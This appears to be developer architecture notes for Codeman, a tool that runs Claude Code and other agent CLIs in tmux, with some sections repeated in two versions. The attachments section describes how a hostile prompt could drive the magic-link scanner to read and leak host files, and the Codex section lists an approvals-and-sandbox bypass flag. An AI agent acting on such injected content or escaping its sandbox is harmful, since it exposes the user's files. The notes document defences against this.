||||
**Input**: `session.writeViaMux()` for programmatic/curl input via tmux `send-keys -l` + `send-keys Enter`, single-line only. Interactive **browser** input goes through a durable **exactly-once** layer: a stable `clientId` + monotonic per-session `seq` persisted to localStorage until the server ACKs, so a dropped link cannot lose or double-deliver a prompt. `ws-connection-registry.ts` supersedes only same-TAB reconnects, so two tabs on one session coexist. → [architecture-invariants#input-delivery-and-ws-resilience](docs/architecture-invariants.md#input-delivery-and-ws-resilience)
|
||||
|
||||
**Agent wait primitives**: bounded long-polls so an agent driving Codeman from a shell can block instead of poll: `GET /api/sessions/:id/wait` (lifecycle signal), `GET /api/sessions/:id/wait-output` (literal substring, **never** regex) and `wait`/`waitTimeout` on `POST /api/sessions/:id/input`. Registry in `session-wait-registry.ts` (pure, no `Session` reference), bounds in `config/agent-wait.ts`. ⚠️ **A timeout is a 200** (`wait.timedOut`), never an error, so callers loop over short waits. ⚠️ `stop`/`blocked` come from Claude Code hooks and therefore fire for **`claude` mode ONLY** (`shell` installs none either); asking for one explicitly on another mode is a 400, the default set silently drops them. ⚠️ Send-and-wait registers the waiter BEFORE the write (a separate POST-then-wait races and reports the PREVIOUS turn), and both teardown paths must `notifySignal('exit')` BEFORE `cancelAll()`. ⚠️ Client-hangup abort listens on **`reply.raw`** guarded by `writableFinished`: on `req.raw`, `close` fires when the request BODY ends, which on a POST killed every send-and-wait instantly and no `app.inject()` test could see it. ⚠️ Worker liveness cannot come from `session.pid` — for a tmux session that is the local attach client, which outlives a worker dying inside its pane — so it is probed at the mux layer (`isPaneDead`, ~750 ms cache) on blocking waits only, never on the input hot path. ⚠️ Signals are edge-triggered with no history: one that fires with no waiter registered is unobservable afterwards, so gather fan-outs with send-and-wait or latched `wait-output` markers, never fire-and-forget-then-sequential-signal-waits. The primitives are packaged as the **`skills/codeman` agent skill**: installable via `codeman skill install [--case <name>]` / `skill uninstall`, or auto-injected into a case's `.claude/skills/` on Claude session create behind `agentSkillEnabled` (SYNCED, default OFF). Injection is ADD-ONLY at create, marker-owned (`applyAgentSkill` in `hooks-config.ts` never touches an unmarked user copy) and refuses symlinks (this repo's own `.claude/skills/codeman` is a symlink to the source, which the injector must never write through). → [architecture-invariants#agent-wait-primitives](docs/architecture-invariants.md#agent-wait-primitives), `docs/api-reference.md`
|
||||
|
||||
**Idle detection**: Multi-layer (completion message → AI check → output silence → token stability). See `docs/respawn-state-machine.md`.
|
||||
|
||||
**Auto-resume on usage limit** ("token pause" control, opt-in per session, top of the Respawn tab): when Claude halts on a subscription limit ("5-hour limit reached ∙ resets 8pm" and all 1.0.x–2.1.x variants), `usage-limit-patterns.ts` (pure, unit-tested) parses the reset time from cleaned output; `SessionAutoOps` arms a timer for reset+2min, then sends Esc (dismisses the rate-limit dialog) + `continue`. Still-limited responses re-arm the loop (5-min retry on stale times); a `working` transition cancels it. Claude-mode only (detection rides `_processExpensiveParsers`). Persists/recovers via `SessionState.autoResumeEnabled`/`autoResumeAt`; respawn cycles are blocked while paused (`isLimitPaused` guard in `onIdleDetected` — prevents `/clear` from wiping the paused conversation). Endpoint: `POST /api/sessions/:id/auto-resume`; SSE: `session:limitPauseScheduled`/`limitResume`/`limitResumeCancelled`. Tests: `test/usage-limit-patterns.test.ts`, `test/session-auto-resume.test.ts`.
|
||||
⚠️ **A `❯` sighting is NOT the end of a turn, and neither is silence.** Claude redraws the composer (`❯`) about once a second all through a turn, so the old "saw a ❯, wait 2s → idle" rule flipped every working session to idle two seconds in (measured: a session mid-tool-call at 17 minutes reporting `status:"idle"`). Its working indicator is `✻ Actualizing… (13m 23s · ↓ 47.5k tokens)`: the glyph animates through `· ✢ ✳ ∗ ✻ ✽`, the gerund is randomized, and the finished line (`✻ Cooked for 2m 49s`) carries the same glyph, so neither `SPINNER_PATTERN` (braille, not what current versions draw) nor a keyword list can see it. Matching the new line in the STREAM does not work either: tmux ships partial repaints, so the whole line reaches the PTY only every few tens of seconds. So: `_confirmIdle()` (session.ts) requires the pane to go quiet, and then asks the SCREEN via `capturePaneText()` + `CLAUDE_WORKING_LINE_PATTERN` before believing it; a sustained run of repaints (`session-activity.ts`, pure + unit tested) is what marks a turn as started, with the same screen probe vetoing keystroke echo. Idle now lands ~3-5s after a turn ends instead of 2s into one. Claude-mode only, since an external CLI has no `❯`, so nothing would ever arm the confirmation and the session would latch busy.
|
||||
|
||||
**Plan-usage chip** (statusLine telemetry, opt-in `showPlanUsageLimits`, default OFF): Claude Code (v2.1.80+) pipes a JSON blob to a configured `statusLine.command` on each render; on Pro/Max it carries a `rate_limits` object (`five_hour`/`seven_day` windows only — no Opus weekly field — each `{used_percentage 0-100, resets_at epoch-SECONDS}`). Codeman injects its OWN statusLine exporter (`generateStatusLineCommand()` in `hooks-config.ts`, identified by the `/api/status-telemetry` marker — it only ever adds/updates/removes a statusLine that is *ours*, never a user's hand-authored one) that POSTs the blob to `POST /api/status-telemetry`. That route (auth-exempt like `/api/hook-event` — localhost-only, hook-secret-gated under a tunnel) parses via `usage-telemetry.ts` (pure, unit-tested), broadcasts SSE `session:statusTelemetry` (de-duped per session by `telemetrySignature` since the statusline fires on every assistant message), and returns a compact plain-text footer for the exporter to **print-through** (so injecting our statusLine doesn't blank the in-terminal footer). `plan-usage-latest.ts` holds the process-wide last value, replayed in the SSE init snapshot (`getLightState`) so the header chip (`#planUsageChip`, toggled by `showPlanUsageLimits` in settings-ui.js) renders immediately on page load / reconnect without per-browser localStorage. Claude-mode only. **Distinct from auto-resume** (which reacts to the limit *message*; this proactively shows the live %). Design: `docs/usage-limits-display-plan.md`. Tests: `test/usage-telemetry.test.ts`.
|
||||
**Auto-resume on usage limit** (opt-in per session, top of the Respawn tab): when Claude halts on a subscription limit, `usage-limit-patterns.ts` (pure, unit-tested) parses the reset time and `SessionAutoOps` arms a timer for reset+2min, then sends Esc + `continue`. ⚠️ Respawn cycles are blocked while paused (`isLimitPaused` guard in `onIdleDetected`), which is what prevents `/clear` from wiping the paused conversation. Claude-mode only. → [architecture-invariants#auto-resume-on-usage-limit](docs/architecture-invariants.md#auto-resume-on-usage-limit)
|
||||
|
||||
**Plan-usage chip** (statusLine telemetry, `showPlanUsageLimits`, per-device: desktop default **ON**, handhelds OFF via the mobile block in `getDefaultSettings()`): resolve it ONLY through `planUsageChipEnabled()` in settings-ui.js, which backs all three call sites (the App Settings checkbox, the chip's visibility, and the `statusLineTelemetry` flag on session create). A chip shown without telemetry renders `—` forever. Codeman injects its own `statusLine.command` exporter which POSTs Claude's `rate_limits` blob to `POST /api/status-telemetry`. The exporter is identified by a marker, so it only ever adds/updates/removes a statusLine that is **ours**, never a user's hand-authored one, and it prints the footer through so the in-terminal statusline is not blanked. Claude-mode only; distinct from auto-resume, which reacts to the limit *message* rather than showing live %. → [architecture-invariants#plan-usage-chip-statusline-telemetry](docs/architecture-invariants.md#plan-usage-chip-statusline-telemetry), `docs/usage-limits-display-plan.md`
|
||||
|
||||
**Orchestrator**: State machine that turns a user goal into a phased plan and drives it to completion: `idle → planning → approval → executing → verifying → (replanning) → completed/failed`. `OrchestratorLoop` (engine) delegates plan generation to `orchestrator-planner` and per-phase verification gates to `orchestrator-verifier`, executing phases via team agents/`task-queue`. State persists under the `orchestrator` key in `state.json`. Distinct from Ralph (single-session autonomous loop) — orchestrator coordinates multi-phase, multi-agent execution. See `docs/orchestrator-loop-architecture.md`.
|
||||
|
||||
**External CLI modes (OpenCode, Codex)**: `isExternalCliMode()` in `session.ts` gates Claude-specific behavior — Ralph tracker, BashToolParser, token/CLI-info parsing, and ❯-prompt readiness detection are all skipped (these CLIs render their own TUIs; readiness = output stabilization instead). Both modes **require tmux — no direct PTY fallback** — because secrets are injected via `tmux setenv`, never on the spawn command line: OpenCode gets `OPENCODE_CONFIG_CONTENT` etc., Codex gets `OPENAI_API_KEY`/`CODEX_API_KEY`/`CODEX_HOME` (`setCodexEnvVars` in `tmux-manager.ts`). Codex specifics: command built by `buildCodexCommand()` (`--model`, `resume <id>`, `--dangerously-bypass-approvals-and-sandbox` from the `codexConfig` payload / `codexDangerouslyBypassApprovals` app setting; `renderMode` is schema-coerced to `'hybrid'`, the only supported mode); tmux exports `COLORTERM=truecolor` + unsets `NO_COLOR` (other modes unset `COLORTERM`); availability via `GET /api/codex/status` — session/quick-start routes fail with `OPERATION_FAILED` and an install hint (`npm install -g @openai/codex`) when the binary is missing. Frontend: run-mode dropdown → `runCodex()` in `session-ui.js` ("Run CX" label), App Settings → Codex CLI tab; Respawn/Ralph options are Claude-only, so session options open on the Summary tab for external CLI sessions. Tests: `test/run-mode-ui.test.ts` (vm-sandbox harness, no real DOM).
|
||||
**Cron (`CronJob`s)**: saved, named jobs on a recurring schedule (`once`/`interval`/`daily`/`weekly`) with per-job run history. ⚠️ **Distinct from the legacy `ScheduledRun`** (`/api/scheduled`, a run-now duration-bounded loop); the two never interact and keep separate `Scheduled*` / `Cron*` names. `CronService` **reuses the existing session layer** rather than rebuilding tmux logic. Next-run math is pure and unit-tested in `cron-time.ts` (server-local timezone). The schedule is advanced BEFORE launch so a slow launch cannot re-trigger. → [architecture-invariants#cron-jobs](docs/architecture-invariants.md#cron-jobs), `docs/cron-discovery.md`
|
||||
|
||||
**Hook events**: Claude Code hooks trigger via `/api/hook-event`. Key events: `permission_prompt`, `elicitation_dialog`, `idle_prompt`, `stop`, `teammate_idle`, `task_completed`. See `src/hooks-config.ts`; upstream hook semantics mirrored in `docs/claude-code-hooks-reference.md`.
|
||||
**Remote sessions + remote SSH cases**: a case can point at a remote host. The agent runs inside a durable remote `tmux -L codeman-remote` (session name `codeman-ssh-<id>`, deliberately failing the remote Codeman's `SAFE_MUX_NAME_PATTERN` so an instance on the target host never adopts it), fronted by a LOCAL tmux pane running `ssh`. Attached (`owned:false`) sessions **detach, never kill** on tab close; owned ones propagate `kill-session`. A bounded-backoff watcher auto-reconnects dropped sessions (`remoteAutoReconnect`, default ON). ⚠️ **Command-injection surface: every ssh command line must flow through `buildSshConnectionArgs()`**, which `shellescape`s every user field. Never hand-build an ssh line elsewhere. ⚠️ Run flows must route remote cases through `POST /api/quick-start`, not `POST /api/sessions` (which stat-validates `workingDir` locally and has no `caseName`). → [architecture-invariants#remote-sessions-over-ssh](docs/architecture-invariants.md#remote-sessions-over-ssh), [#remote-ssh-cases](docs/architecture-invariants.md#remote-ssh-cases), `docs/remote-sessions.md`
|
||||
|
||||
**Docker cases**: a case can point at a **container**, with any of the five CLI backends running inside it. Like remote-SSH this is a **LOCATION OVERLAY on cases, never a sixth `SessionMode`**. Exactly one long-lived container **per case**, shared by all its sessions, so killing a session kills only that session's in-container tmux and **never** `docker stop` while siblings remain. The workspace is a real host dir bind-mounted at the **same absolute path**, which is what keeps file-routes/watchers on real host bytes and makes the in-container transcript projHash match the host. Credentials are **seeded** (RO mount, copied into the container once) rather than shared RW, so in-container CLIs never write refreshed tokens back to the host, and bind mounts are excluded from `docker commit` so exports stay secret-free. **NEVER a create-time `-e` for secrets, NEVER `--privileged`, NEVER the docker socket.** Config drift is detected via a label hash and a drifted launch is REFUSED rather than silently launched with stale config. ⚠️ On the loopback-only prod bind a container cannot reach 127.0.0.1, so in-container hooks need `CODEMAN_DOCKER_BRIDGE_HOOKS=1`; otherwise idle detection falls back to output-based. → [architecture-invariants#docker-cases](docs/architecture-invariants.md#docker-cases), `docs/docker-cases.md` (user guide), `docs/docker-cases-plan.md` (design)
|
||||
|
||||
**External CLI modes (OpenCode, Codex, Gemini, Antigravity)**: `isExternalCliMode()` in `session.ts` gates Claude-specific behavior off (Ralph tracker, BashToolParser, token/CLI-info parsing, ❯-prompt readiness); these CLIs render their own TUIs, so readiness is output stabilization instead. All four **require tmux with no direct PTY fallback**, because secrets are injected via socket-scoped `tmux setenv` and never on the spawn command line. ⚠️ `run*()` in `session-ui.js` MUST unwrap the `{success,data}` envelope; reading the raw shape silently breaks the run. ⚠️ **Codex sessions use PREDICTIVE WRITE-THROUGH echo, never the buffer overlay** (`_localEchoPolicy` in `_updateLocalEchoState`, terminal-ui.js): codex's composer reacts per keystroke ("/" pops a live-filtering picker, arrows edit server-side state, the composer grows as it wraps), so buffer-until-Enter starved it into issues #218/#219/#220/#222 and stays disabled (`_localEchoEnabled` remains false for codex). Instead, `PredictiveEchoAddon` (separate `vendor/xterm-predictive-echo.js` bundle) paints each keystroke at the predicted cell while the wire path stays BYTE-IDENTICAL: the onData hook (`_predictHookOnData`) is a plain statement with no `return`, so control always falls through into the untouched send path — pinned by vm and E2E byte-identity tests. Predictions reconcile against the parsed buffer and only while the cursor sits on the measured composer row (`isCodexComposerRow`, `/^› /`). Codex also **drops keystrokes that share a PTY read with a bracketed paste**, so flushed text and the paste sequence must go out as separate delayed writes (mirroring the Enter branch's delayed `\r`). Tests: `test/local-echo-codex-gating.test.ts`, `test/codex-predictive-echo.test.ts` (E2E vs real codex), `packages/xterm-zerolag-input/test/codex-replay.test.ts`. → [architecture-invariants#external-cli-modes-opencode-codex-gemini](docs/architecture-invariants.md#external-cli-modes-opencode-codex-gemini-antigravity)
|
||||
|
||||
**Run launch synchronization**: the Run entrypoint holds an in-flight lock and disables `#runBtn` for the whole launch (≥500ms), so a double click cannot create duplicate sessions with the same `w<n>-<case>` name. `_ensureCreatedSessionVisible()` runs before `selectSession()`, and `_onSessionCreated()` stays an idempotent upsert, so POST-first and SSE-first ordering both produce exactly one rendered tab. → [architecture-invariants#run-launch-synchronization](docs/architecture-invariants.md#run-launch-synchronization)
|
||||
|
||||
**Unified session list**: `GET /api/sessions/unified` merges live sessions, persisted state, lifecycle-log history, and Claude transcript files into one deduped list (pure core in `src/services/unified-session-service.ts`). Transcript rows fold into their owning session via a `claudeSessionId → Codeman id` alias map, so resumed and `/clear`-respawned sessions do not appear twice. No terminal buffers in the response, unlike `/api/sessions`. Backs the Cmd+K Session Manager, plus pinning and cross-device tab order (`PUT /api/session-order`; pure merge helpers in `src/session-order.ts`, pushing device wins and server-only ids are never dropped). → [architecture-invariants#unified-session-list-and-session-manager](docs/architecture-invariants.md#unified-session-list-and-session-manager)
|
||||
|
||||
**Hook events**: Claude Code hooks trigger via `/api/hook-event`. Key events: `permission_prompt`, `elicitation_dialog`, `elicitation_complete`, `elicitation_response`, `idle_prompt`, `stop`, `teammate_idle`, `task_completed`. See `src/hooks-config.ts`; upstream hook semantics mirrored in `docs/claude-code-hooks-reference.md`.
|
||||
|
||||
**Approvals Inbox** (cross-session queue of prompts waiting on a human; `approvalsInboxEnabled`, SYNCED, default OFF: every surface is opt-in; only the store and answer endpoints run regardless, so flipping it ON shows anything already pending): `web/approval-inbox.ts` is a `sessionWaits`-style singleton fed by `/api/hook-event`, holding at most ONE item per session (a new prompt supersedes), claude-mode only, in-memory. Cards are answered via `POST /api/approvals/:id/answer`, which sends a digit / Esc / idle-prompt text through `writeViaMux` (menu answers never carry `\r`). ⚠️ `option` digits are accepted ONLY when they match options parsed from the captured pane frame, and the answer path RE-CAPTURES the pane first (a dialog that no longer parses on screen means the keystroke would land in the composer, so refuse with 409). ⚠️ Resolution on the heuristic `working` signal is restricted to `idle` items; permission/question items clear only on definitive signals (`stop`, `elicitation_complete`/`elicitation_response`, exit/delete, answer, supersede, 12h TTL). The frontend seeds from `GET /api/approvals` in `handleInit` (which is what makes tab alerts survive reloads), but only with the setting ON; push Approve/Deny buttons are also gated on it (`sendPushNotifications` strips `actions`/`approvalId` when OFF) and are answered from `sw.js` directly so they work with no tab open. Surfaces (all gated on the setting): header bell (marker-hidden until count > 0, phones never show it) + drawer (`approvals-ui.js`), phone overview NEEDS YOU answer strips (`mobile-overview.js`). Design: `docs/approvals-inbox-plan.md`.
|
||||
|
||||
**Read My Mind intent profiles** (phase 1 of `docs/readmymind-plan.md`; `readMyMindEnabled`, SYNCED, default OFF): per-CASE profiles (user-stated `goals` + the user's recent real prompts), keyed by owner + realpath(workingDir) so they survive `/clear`/respawns and multi-user scoping is structural. Capture rides the transcript (`transcript:user_prompt` from `transcript-watcher.ts`), NOT the input paths: `POST /input` sees only programmatic prompts and the WS channel is raw keystrokes. The listener lives inside `startTranscriptWatcher()`'s `if (!watcher)` block (outside it would duplicate per hook event) and is claude-only + gated on the setting per event. Store: `src/intent-store.ts` singleton, `intents.json` written 0600 tmp+rename (prompts can contain secrets; never fed to `/api/search`). Endpoints: GET/PUT/DELETE `/api/sessions/:id/intent` + POST `/api/sessions/:id/readmymind` (`readmymind-routes.ts`, ownership via `findSessionOrFail` WITH `req`; registrations stay the bare `app.<method>('path')` shape, the endpoints.md drift scanner cannot see generics). **Phase 2 (predictor + 🧠 button)**: `readmymind-context.ts` is the PURE budgeted assembler (9 ranked sources, drop order siblings→away→workspace→tools, sections 1-4 truncate only); IO lives in `readmymind-collectors.ts` (transcript TAIL read — the live watcher keeps only a 500-char snippet — + git signals, skipped for remote-SSH cases) and the route; `readmymind-predictor.ts` reuses the AiCheckerBase spawn mechanics standalone (verdict-shaped base vs freeform JSON) as a mutable singleton routes call and tests stub. Claude-mode only (400), one in flight per session (409 CONFLICT), model = `readMyMindModel` setting defaulting to `AI_CHECK_MODEL` (opus, decided). Frontend `readmymind-ui.js`: header 🧠 marker-hidden (`btn-readmymind--hidden`) until the setting is ON; phones hide it in mobile.css and get a keyboard-accessory 🧠 key instead (ships in BOTH bar templates, revealed by the `rmm-enabled` class on the BAR element — setMode() rebuilds button innerHTML, so per-key state would be wiped; synced at init + every `applyHeaderVisibilitySettings()`). Alternate suggestions render as tappable rows that swap into the editable field without losing edits; Rethink rejects the whole shown set and carries the optional steer note (`#readMyMindSteer`, sent as `steer`, shown in ready + empty-result phases, cleared on each open). Suggestions render via value/`textContent` ONLY and Send/Insert go through `POST /input` (server-side, so the sendEnterKey/local-echo trap does not apply) — nothing auto-sends, ever. User guide: `docs/readmymind.md`.
|
||||
|
||||
**Voice dictation via Claude** (`claudeVoiceEnabled`, SYNCED, default OFF): the mic button can transcribe through this machine's Claude Code login instead of a Deepgram key, using the same speech-to-text service the CLI's own `/voice` mode uses. ⚠️ **Claude Code's voice mode itself is unusable here**: it opens the HOST's microphone (`sox`/`arecord`), and the CLI runs in a headless tmux pane while the human is in a browser elsewhere. So Codeman captures in the browser and borrows only the backend. Audio goes browser → Codeman → Anthropic (`src/web/voice-stream.ts`): the OAuth token never reaches the page, and the browser only sends PCM and receives text. ⚠️ Credentials are **read-only** (`src/claude-credentials.ts`) and Codeman never refreshes them — a refresh rotates the refresh token and could sign the user out of their own CLI; an elapsed token reports `expired` instead. ⚠️ Capture MUST be linear16/16 kHz/mono, so it uses an **AudioWorklet**, not MediaRecorder (which cannot emit raw PCM); `voice-pcm-worklet.js` is fetched from JS, so it is invisible to `cacheBustAssets` and borrows voice-input.js's `?v=` token — **edit the two together**. ⚠️ Transcript frames carry the WHOLE running transcript, not deltas: the Claude path replaces where the Deepgram path appends. Provider choice is `voiceSettings.provider` (`auto` prefers Claude → Deepgram → Web Speech). → `docs/claude-voice-plan.md`
|
||||
|
||||
**Agent Teams**: `TeamWatcher` polls `~/.claude/teams/`, matches to sessions via `leadSessionId`. Teammates are in-process threads appearing as subagents. Enable: `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`. See `docs/agent-teams/`.
|
||||
|
||||
**Circuit breaker**: Prevents respawn thrashing. States: `CLOSED` → `HALF_OPEN` → `OPEN`. Reset: `/api/sessions/:id/ralph-circuit-breaker/reset`.
|
||||
**Circuit breakers**: the Ralph breaker prevents respawn thrashing (`CLOSED` → `HALF_OPEN` → `OPEN`; reset via `/api/sessions/:id/ralph-circuit-breaker/reset`). **Distinct: the PTY-exit breaker** (`session-pty-exit-breaker.ts`) trips after repeated rapid PTY exits and blocks auto-restarts. ⚠️ It resets ONLY via an explicit `{clearBreaker:true}` body on `POST /api/sessions/:id/interactive`; the frontend's auto-reattach in `selectSession()` sends no body and must never clear it. → [architecture-invariants#circuit-breakers-ralph--pty-exit](docs/architecture-invariants.md#circuit-breakers-ralph-and-pty-exit)
|
||||
|
||||
**Self-update** (App Settings → Updates): in-app updater for **git-clone installs** supervised by systemd/launchd. Supervisors: `systemd` (user unit), `launchd` (GUI LaunchAgent, gui-domain kickstart), `launchd-daemon` (KeepAlive system LaunchDaemon on headless Macs — restarts rootlessly by killing the server PID and letting launchd respawn it; detected only when the daemon is bootstrapped AND KeepAlive), else `none` → "restart manually" message; on next boot a manual-restart status auto-completes when the running version matches the target. The update restarts the very process running it, so the real work runs in a DETACHED `scripts/self-update.sh` (`git checkout <release tag> && npm install && npm run build && restart`) that outlives the restart; it writes progress to `dataPath('update-status.json')`, which the browser polls across the connection drop. Channel = latest `codeman@X.Y.Z` release tag; dirty trees are auto-stashed. `src/web/self-update.ts` splits PURE helpers (semver/tag parsing, reconcile decision — unit-tested) from IO wrappers (`getInstallInfo`/`checkForUpdate`/`startUpdate`/`reconcileUpdateOnBoot`). Routes: `GET /api/system/update/check`, `POST /api/system/update`, `GET /api/system/update/status`. Types: `src/types/update.ts`. npm installs report as non-updatable.
|
||||
**Full-scrollback replay**: `GET /api/sessions/:id/terminal?full=1` returns the entire tmux scrollback, bounded by the configured history limit. On success the capture is returned ALONE (`source='mux-full-history'`), superseding the byte buffer so nothing duplicates. The first load of EACH session per page load requests `full=1` (`_fullHistoryLoaded` Set); tab switches keep the cheap `?tail=` path, and scrolling up at the TOP of the buffer re-pulls `full=1` on demand (cooldown-guarded — tmux repaints bursty output in place, so browser scrollback shrinks while tmux's history stays complete). ⚠️ That re-pull must never DOWNGRADE the buffer: a repaint-mode CLI pane keeps no tmux history, so its capture is one frame and the reset+rewrite would delete history mid-scroll — `_replayWouldShrinkBuffer()` refuses it and slows that session's cooldown to 60s. → [architecture-invariants#full-scrollback-replay](docs/architecture-invariants.md#full-scrollback-replay)
|
||||
|
||||
**Attachments** (live external document references; COD-37/#119 core, COD-38/#120 previews, COD-39/#121 history): all wiring in `file-routes.ts`. **Registry** (`attachment-registry.ts`): an **in-memory** map of a stable `attachmentId` → an absolute, `realpath`-resolved, extension-allowlisted file path, so browser requests (`GET /api/sessions/:id/attachments/:attachmentId/raw`) never carry arbitrary absolute paths; `POST /api/sessions/:id/attachments` registers one. **Magic links** (`attachment-magic.ts`): parses `codeman://attach?...` out of terminal output — ⚠️ this scanner is prompt-injectable, so the scan path is **force-confined to the session workspace** (a hostile prompt could otherwise make it read arbitrary host files over SSE); emits the `attachment:detected` SSE event. Security gate is an extension **allowlist** (`isSupportedAttachmentExtension`, in the registry/magic modules), not a blocklist; a separate path layer (`config/attachment-guard.ts`) confines reads to the workspace (`attachmentConfineToWorkspace`) and blocks sensitive trees (`/root`, `/etc`). **Previews + thumbnails** (COD-38): `:attachmentId/preview` + `:attachmentId/thumbnail` (and the workspace-file equivalents `file-preview`/`file-thumbnail`) render Office docs/PDFs via external converters (`pdftoppm` / LibreOffice `soffice` / Word-COM `powershell`); `document-preview-cache.ts` is a shared disk cache (de-dups *identical* in-flight inputs), `document-thumbnailer.ts` does best-effort first-page images, and `document-conversion-limiter.ts` is a **global converter-spawn concurrency cap** (`runWithConversionLimit`) — without it, N distinct large docs detected at once fork N multi-minute converter processes = a localhost fork-bomb-shaped resource-exhaustion vector. **History drawer** (COD-39): `session-attachment-history.ts` tracks the last `ATTACHMENT_HISTORY_LIMIT` (100) attachments per session (`Session._attachmentHistory`, persisted via `SessionState.attachmentHistory`, replayed so externals re-register on reconnect); `GET /api/sessions/:id/attachments` is the list endpoint. ⚠️ The history drawer's launcher button is desktop-only — hidden on phones (regression-guarded; see `mobile-header-buttons-policy` test). Session-local files keep using the existing workspace-scoped `file-routes` paths; the registry is only for explicit live externals.
|
||||
**Terminal scrollback strip + wheel/touch forwarding** (#205): codex/claude/gemini get the FULL strip (alt-screen, `3J`, mouse DECSETs); tmux-backed shell/opencode/antigravity get a NARROW strip (alt-screen toggles only — it removes tmux's own attach-time `smcup`, which otherwise parks xterm in the scrollback-less alt buffer and turns the wheel into arrow keys). ⚠️ Gated on `useMux`: direct-PTY fallback sessions must keep the alt screen for vim/less/htop. Wheel AND touch forward to the CLI transcript for **claude ≥ 2.1.187 ONLY** at ANY scroll position (snap-to-bottom first); Shift+wheel and the `terminalWheelLocalScrollback` setting stay local. ⚠️ Codex was in that list and must never go back without a fresh measurement: codex-cli 0.147.0 ignores SGR wheel reports entirely (`mouse_any_flag=0`, inline viewport, transcript pushed into terminal scrollback), so forwarding produced a dead wheel (#227 follow-up). `_wheelScrollLines()` reads `ev.deltaMode` (Firefox = LINE units). ⚠️ When that gate is FALSE on a claude session whose local buffer is hollow (`baseY === 0`), the gesture becomes coalesced PageUp/PageDown key sends (`_maybePageCliTranscript`) instead of a no-op; ⚠️ and `getClaudeCliVersion()` must never cache a FAILED probe (one timeout used to disable forwarding process-wide until restart). `_logScrollRouting()` prints the routing decision and its inputs once per session — read it before diagnosing a scroll report. → [architecture-invariants#terminal-scrollback-strip-flavors-and-wheeltouch-forwarding](docs/architecture-invariants.md#terminal-scrollback-strip-flavors-and-wheeltouch-forwarding)
|
||||
|
||||
**Detached start + service install** (issue #231): `codeman web -d` relaunches the SAME entry script with `detached:true` (setsid), so there is no controlling terminal and no shell job entry. ⚠️ `nohup` is NOT what makes this work: Node re-arms SIGHUP to its default disposition even when it inherits "ignore", and `cli.ts` handles SIGHUP with a graceful shutdown, so a delivered HUP still stops the server. ⚠️ Both `-d` and `service install` must REFUSE when a server is already up on this data dir (pidfile check + `/api/status` probe): a second instance on the shared tmux socket attaches PTYs to the first one's live sessions. ⚠️ Neither may report success it has not observed — the parent polls `/api/status` until the child answers or dies, since `launchctl load` and a clean spawn are both silent about a server that starts and immediately exits. `--stop` verifies the pid still LOOKS like a Codeman server (`ps -o command=`) before signalling, because pids get recycled. Unit/label names live in `config/service-names.ts` so install.sh, `detectSupervisor()` and `service install` cannot drift into supervising two copies; they are instance-scoped, and identical to the historical names for the default instance. `service install` bakes the installing shell's PATH into the unit (launchd gives a job `/usr/bin:/bin:/usr/sbin:/sbin`, which finds neither a Homebrew/nvm `node` nor `tmux`/`claude`) and never writes `CODEMAN_PASSWORD` into it. → [architecture-invariants#detached-start-and-service-install](docs/architecture-invariants.md#detached-start-and-service-install)
|
||||
|
||||
**Self-update** (App Settings → System → Updates): in-app updater for git-clone installs supervised by systemd/launchd (`systemd`, `launchd`, `launchd-daemon`, else `none` → "restart manually"). The update restarts the very process running it, so the real work runs in a DETACHED `scripts/self-update.sh` that outlives the restart and writes progress to `update-status.json`, which the browser polls across the connection drop. `src/web/self-update.ts` splits pure helpers (unit-tested) from IO wrappers. npm installs report as non-updatable. → [architecture-invariants#self-update](docs/architecture-invariants.md#self-update)
|
||||
|
||||
**Attachments** (live external document references; all wiring in `file-routes.ts`): a **registry** maps a stable `attachmentId` to a realpath-resolved, extension-allowlisted absolute path, so browser requests never carry arbitrary absolute paths. ⚠️ The **magic-link scanner** (`codeman://attach?...` in terminal output) is **prompt-injectable**, so its scan path is force-confined to the session workspace; a hostile prompt could otherwise exfiltrate arbitrary host files over SSE. The security gate is an extension **allowlist**, not a blocklist. `document-conversion-limiter.ts` caps converter spawns globally: without it, N large docs detected at once fork N multi-minute processes, which is a resource-exhaustion vector. → [architecture-invariants#attachments](docs/architecture-invariants.md#attachments)
|
||||
|
||||
**Filesystem path picker** (Link Existing "Browse" + the mobile keyboard's `📁 Path` key): lazy one-directory browsing via `GET /api/filesystem/browse`, with `GET /api/filesystem/preview` for the tapped file. Inserts the path **without** Enter, so the prompt is never submitted; the sibling `⌫ All` key clears only the unsent prompt and must never send the agent's `/clear`. ⚠️ This is a **second file-serving surface and inherits neither the attachment confinement nor its ownership scoping** — it allowlists Home, `CASES_DIR`, `/mnt/d` and `CODEMAN_FILE_PICKER_ROOTS`, blocks sensitive trees, and rejects symlink escapes **after** `realpath`. ⚠️ The optional `sessionId` is an ownership boundary that must be `canAccessOwned`-checked by hand (it does not go through `findSessionOrFail`), and in multi-user mode a non-admin gets only their own `userSpacePath` as a root: per-user spaces live INSIDE `homedir()`, so a `Home` root exposes every other user's workspace. Previews go through the same global conversion limiter, and Markdown/TXT/JSON are served as inert `text/plain`. → [architecture-invariants#filesystem-path-picker](docs/architecture-invariants.md#filesystem-path-picker)
|
||||
|
||||
**File Viewer edit mode** (issue #212): the file-preview overlay edits workspace text files in place — `GET .../file-content?edit=1` + `PUT /api/sessions/:id/file-content`, policy in `src/config/file-editing.ts`. This is a **third file surface and the only one that WRITES**: read-path confinement (realpath + workspace + ownership) plus sensitive/blocked/`.git` denies and an extension **allowlist**; writes are `wx`-temp + rename (no `O_CREAT` anywhere = edit-in-place is structural); optimistic concurrency via sha256 `baseHash` → 409. ⚠️ `edit=1` never truncates and the client must never save a plain-preview buffer (the 500-line truncation would silently delete the rest). ⚠️ CRLF/UTF-8 guards: EOL re-applied server-side, non-UTF-8 refused via round-trip compare. → [architecture-invariants#file-viewer-edit-mode](docs/architecture-invariants.md#file-viewer-edit-mode), `docs/file-viewer-edit-plan.md`
|
||||
|
||||
**Ultracode / workflow-run visualization** (opt-in, default OFF): the Workflow tool writes a completion artifact only at run *end*, so live in-flight runs exist solely as transcript dirs. `workflow-run-watcher.ts` therefore synthesizes ACTIVE runs from transcripts until the completion artifact appears and supersedes them. It is **STANDALONE** and deliberately never imports or touches `subagent-watcher.ts`, despite reading the same tree. Two independent toggles: `showUltracodeAgents` (docked panel) and `ultracodeFloatingWindows` (floating windows); the watcher starts if **either** is on. → [architecture-invariants#ultracode--workflow-run-visualization](docs/architecture-invariants.md#ultracode-and-workflow-run-visualization)
|
||||
|
||||
